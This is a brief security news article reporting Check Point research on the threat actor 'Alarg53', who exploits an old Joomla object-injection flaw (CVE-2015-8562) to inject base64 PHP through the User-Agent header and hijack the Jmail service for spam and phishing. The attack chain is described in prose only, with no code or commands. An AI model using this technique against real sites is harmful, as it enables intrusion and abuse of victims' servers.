• Joomla is believed to still contain an old remote code execution (RCE) flaw in its platform.
• An attacker exploited this flaw and used malicious PHP code to compromise websites as well as bypassed the CMS’ mail service.

Popular content management system (CMS) Joomla has been hit with new spam campaigns recently. As per a report by Check Point Research, a threat actor who goes by the name ‘Alarg53’ has intruded many Joomla-powered websites by exploiting a security flaw.

The CMS’ mail service, Jmail, was the primary target of the attack. By abusing Jmail, new phishing and spamming infrastructure could easily be set-up.

How does it work?

• According to Check Point, the attacker firstly exploits the old Joomla Object Injection Remote Code Execution (CVE-2015-8562) vulnerability.
• A malicious base64 PHP string is injected in the User-Agent field in HTTP requests.
• This PHP code is decoded to run on the target system and then downloads certain files from Pastebin.
• One of the downloaded files overrides Jmail. This file serves functions such as sending emails and uploading files.
• This file now becomes an infrastructure where the attacker can perform operations such as file uploading, and use it for phishing or spamming.

Who is the attacker – Alarg53 has a notable history in the cybercrime space. It is reported that he has hacked more than 15,000 websites in the last few years. His trademark signature is to replace affected websites with a sign saying ‘Hacked by Alarg53’.

“Two years ago, Alarag53 gained worldwide attention by attacking The Biology of Aging Center at Stanford University’s website. At first, it was thought to be just another ‘Hacked By Alarg53’ attack, but within a few hours, two PHP files were uploaded to the relevant servers enabling them to send large amounts of spam mail,” Check Point researchers wrote.